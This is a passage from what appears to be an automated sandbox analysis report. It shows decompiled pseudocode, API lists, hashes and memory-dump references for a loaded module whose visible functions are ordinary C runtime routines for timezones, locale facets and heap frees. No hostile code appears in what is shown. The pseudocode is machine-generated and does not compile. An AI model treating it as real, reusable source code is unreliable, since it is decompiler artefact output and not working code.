											 *(_t249 + 0x18) = _t261[1];
											goto L39;
										}
										__eflags = _t247;
										if(_t247 != 0) {
											 *_t261 =  *(_t261 + _t247 * 8);
											_t261[1] =  *(_t261 + 4 + _t247 * 8);
											 *(_t261 + _t247 * 8) = _v720;
											 *(_t261 + 4 + _t247 * 8) = _v708;
										}
										goto L28;
									}
									L39:
									_t176 = _t210 * 0xc;
									_t110 = _t176 + 0x6e230de8; // 0x6e1c815c
									 *0x6e22a26c(_t249);
									_t178 =  *((intOrPtr*)( *_t110))();
									_t233 = _v724;
									__eflags = _t178;
									if(_t178 == 0) {
										__eflags = _t233 - 0x6e2852b0;
										if(_t233 != 0x6e2852b0) {
											_t260 = _t210 + _t210;
											__eflags = _t260;
											asm("lock xadd [eax], ecx");
											if(_t260 != 0) {
												goto L44;
											} else {
												_t128 = _t260 * 8; // 0x10468b00
												E6E20CBD3( *((intOrPtr*)(_t249 + _t128 + 0x28)));
												_t131 = _t260 * 8; // 0x3b8e8
												E6E20CBD3( *((intOrPtr*)(_t249 + _t131 + 0x24)));
												_t134 = _t210 * 4; // 0xe764e850
												E6E20CBD3( *((intOrPtr*)(_t249 + _t134 + 0xa0)));
												_t236 = _v704;
												 *((intOrPtr*)(_v716 + _t249)) = _t236;
												 *(_t249 + 0xa0 + _t210 * 4) = _t236;
											}
										}
										_t234 = _v732;
										 *_t234 = 1;
										 *((intOrPtr*)(_t249 + 0x28 + (_t210 + _t210) * 8)) = _t234;
									} else {
										 *(_v716 + _t249) = _t233;
										_t115 = _t210 * 4; // 0xe764e850
										E6E20CBD3( *((intOrPtr*)(_t249 + _t115 + 0xa0)));
										 *(_t249 + 0xa0 + _t210 * 4) = _v736;
										E6E20CBD3(_v732);
										 *(_t249 + 8) = _v740;
										goto L2;
									}
									goto L3;
								}
							}
						} else {
							goto L3;
						}
						goto L47;
					}
					asm("sbb eax, eax");
					_t160 = _t159 | 0x00000001;
					__eflags = _t160;
					goto L11;
				} else {
					L2:
					L3:
					_pop(_t257);
					return E6E1DF8A5(_v8 ^ _t265, _t247, _t257);
				}
				L47:
			}

APIs

Part of subcall function 6E20D5FF: GetLastError.KERNEL32(?,6E29CE94,6E201803,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D603
Part of subcall function 6E20D5FF: _free.LIBCMT ref: 6E20D636
Part of subcall function 6E20D5FF: SetLastError.KERNEL32(00000000,6E282B60,0000000C,6E1C402A,00000000,00000001,?,`k(n,00000020,6E1C159B,90EFF98A), ref: 6E20D677
Part of subcall function 6E20D5FF: _abort.LIBCMT ref: 6E20D67D

_memcmp.LIBVCRUNTIME ref: 6E20EC2E
_free.LIBCMT ref: 6E20EC9F
_free.LIBCMT ref: 6E20ECB8
_free.LIBCMT ref: 6E20ECEA
_free.LIBCMT ref: 6E20ECF3
_free.LIBCMT ref: 6E20ECFF

Strings

C, xrefs: 6E20EAEC

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 22e2278fef2eceb4c2a13ef5dc10cc82be1cc51eb67d10aef225fe92f3f378a8
Instruction ID: 5b0b93a21a20beccc85b813fe93f79cc657e95b3aae1d33c2946f6e57672846f
Opcode Fuzzy Hash: 22e2278fef2eceb4c2a13ef5dc10cc82be1cc51eb67d10aef225fe92f3f378a8
Instruction Fuzzy Hash: 29C14975A0121A9FDB64CF58C884A9DB7B6FF49304F5045AAD94AA7394E731AE80CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E218951, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E218951(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __esi;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				void* _t87;
				signed int _t88;
				signed int _t90;
				int _t94;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t89 = __edi;
				_t96 = E6E21822B();
				_t1 =  &_v8; // 0x6e232130
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E6E218289(_t1);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E202188();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x6e28506c; // 0x9881d723
					_v56 = _t38 ^ _t106;
					 *0x6e285384 =  *0x6e285384 | 0xffffffff;
					 *0x6e285378 =  *0x6e285378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6e287a10 = 0;
					_t42 = E6E211216(0x6e232130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6e232130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6E20F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6E211216(0x6e232130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6e232130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6E20CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6E20CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6E218951(0x6e232130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6E21877C(0x6e232130, _t90, __eflags);
						}
					}
					E6E20CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6E1DF8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6E218231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6E21825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6E20CBD3( *0x6e287a08);
							 *0x6e287a08 = 0;
							 *_t107 = 0x6e287a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6e287a18 * 0x3c;
								_t88 =  *0x6e287a6c; // 0x0
								_push(__edi);
								 *0x6e287a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6e287a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6e287ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6e287ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6E203CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6e287a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6e287a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6E218225()) = _v8;
							 *(E6E218219()) = _v12;
							_t61 = E6E21821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E232130), ref: 6E2189BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6E218A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6E287A70,000000FF,?,0000003F,00000000,?), ref: 6E218A60
_free.LIBCMT ref: 6E2189A9

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E218B75

Strings

0!#n, xrefs: 6E218AD8
0!#n, xrefs: 6E218964, 6E21896A

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!#n$0!#n
API String ID: 1286116820-3624508691
Opcode ID: 1828f2b09bdc5ad7e49f89684899cd7bb104726caea3e3faa449be96005b1205
Instruction ID: e372011220b55871f39097894fc21775425ffea736f2159fa9be8215c809bda3
Opcode Fuzzy Hash: 1828f2b09bdc5ad7e49f89684899cd7bb104726caea3e3faa449be96005b1205
Instruction Fuzzy Hash: F051B97190861EEFDB04DFE58CC49EAB7FFAB46354B10066AE621E7290D7309B44C761

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CFC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E1CFC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t66 - 0x14, 0);
				_t63 =  *0x6e286dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1A161C(0x6e286d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1A171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E1C66BA(_t66 - 0x14);
					return E6E1E0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E1D162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1A1438(_t55);
							E6E1E3D74(_t66 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e22851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e22c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E1D542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E1E0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E1C6FD3(__eflags, _t61);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e286dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CFC90
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CFC9A
int.LIBCPMT ref: 6E1CFCB1

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CFCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CFD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CFD29

Strings

`m(n, xrefs: 6E1CFCA5

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `m(n
API String ID: 651022567-2906296985
Opcode ID: 2304da67fb916cdd08fd64f2ec2af778190930b1cd5f8672c9260534838d3a24
Instruction ID: b592d4e4f577ea2be97231f66722a7ffe644ee2aabb88268f3db0a42384b1074
Opcode Fuzzy Hash: 2304da67fb916cdd08fd64f2ec2af778190930b1cd5f8672c9260534838d3a24
Instruction Fuzzy Hash: 7A1136759105288BCF01EBE4C854AFEB37ABFA5B14F240808E420E7290DF789984E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6E1DBB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t110 - 0x14, 0);
				_t105 =  *0x6e286e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6E1A161C(0x6e286e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6E1C66BA(_t110 - 0x14);
					return E6E1E0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6E1DC229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t110 - 0x20);
							E6E1E3D74(_t110 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t102, _t105, 0x14);
							E6E1C6653(_t110 - 0x14, 0);
							_t106 =  *0x6e286e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1A161C(0x6e286e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1A171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E1C66BA(_t110 - 0x14);
								return E6E1E0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E1DC295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1A1438(_t93);
										E6E1E3D74(_t110 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e22851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e22c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E1DD028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E1E0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E1C6FD3(__eflags, _t103);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e286e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E1C6FD3(__eflags, _t102);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e286e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DBB37
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DBB41
int.LIBCPMT ref: 6E1DBB58

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DBB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBBD0

Strings

n(n, xrefs: 6E1DBB4C

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: n(n
API String ID: 651022567-879260925
Opcode ID: f282964f77630d8673d8503a03abd34e9dcbc59e8e755387b7e3726fced1a1b9
Instruction ID: d32b9b098d6a86a3a02ef855666e18e5029482bf4c89756e12b723f6b8355137
Opcode Fuzzy Hash: f282964f77630d8673d8503a03abd34e9dcbc59e8e755387b7e3726fced1a1b9
Instruction Fuzzy Hash: 69112075D106288BCF01EBE4C854EFEB77ABF94714F140908E020AB290DFB49A88E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DBBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E1DBBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t66 - 0x14, 0);
				_t63 =  *0x6e286e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1A161C(0x6e286e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1A171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E1C66BA(_t66 - 0x14);
					return E6E1E0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E1DC295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1A1438(_t55);
							E6E1E3D74(_t66 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e22851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e22c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E1DD028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E1E0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E1C6FD3(__eflags, _t61);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e286e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1DBBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6E1DBBE7
int.LIBCPMT ref: 6E1DBBFE

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1DBC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1DBC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1DBC76

Strings

$n(n, xrefs: 6E1DBBF2

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $n(n
API String ID: 651022567-3138053034
Opcode ID: 129235130b64a5642afe1ca213275f7064492e4ca5c886d626d590e41bcc57e6
Instruction ID: 8c3549ca1929aff912c114db40eafea3d56b75bd14fbf5132257b1863471513e
Opcode Fuzzy Hash: 129235130b64a5642afe1ca213275f7064492e4ca5c886d626d590e41bcc57e6
Instruction Fuzzy Hash: 08113675910518CBCF01DBE4C854EFEB77ABF94704F140908E121AB290DF749D89E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t330 - 0x14, 0);
				_t315 =  *0x6e286db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1A161C(0x6e286d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E1C66BA(_t330 - 0x14);
					return E6E1E0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E1D13A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t330 - 0x20);
							E6E1E3D74(_t330 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t307, _t315, 0x14);
							E6E1C6653(_t330 - 0x14, 0);
							_t316 =  *0x6e286ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1A161C(0x6e286d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E1C66BA(_t330 - 0x14);
								return E6E1E0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E1D1409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t330 - 0x20);
										E6E1E3D74(_t330 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t234, _t308, _t316, 0x14);
										E6E1C6653(_t330 - 0x14, 0);
										_t317 =  *0x6e286de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1A161C(0x6e286d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E1C66BA(_t330 - 0x14);
											return E6E1E0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E1D1471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t330 - 0x20);
													E6E1E3D74(_t330 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t234, _t309, _t317, 0x14);
													E6E1C6653(_t330 - 0x14, 0);
													_t318 =  *0x6e286dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1A161C(0x6e286da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E1C66BA(_t330 - 0x14);
														return E6E1E0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E1D14EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t330 - 0x20);
																E6E1E3D74(_t330 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t234, _t310, _t318, 0x14);
																E6E1C6653(_t330 - 0x14, 0);
																_t319 =  *0x6e286dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1A161C(0x6e286d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1A171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E1C66BA(_t330 - 0x14);
																	return E6E1E0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E1D1558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t330 - 0x20);
																			E6E1E3D74(_t330 - 0x20, 0x6e283504);
																			asm("int3");
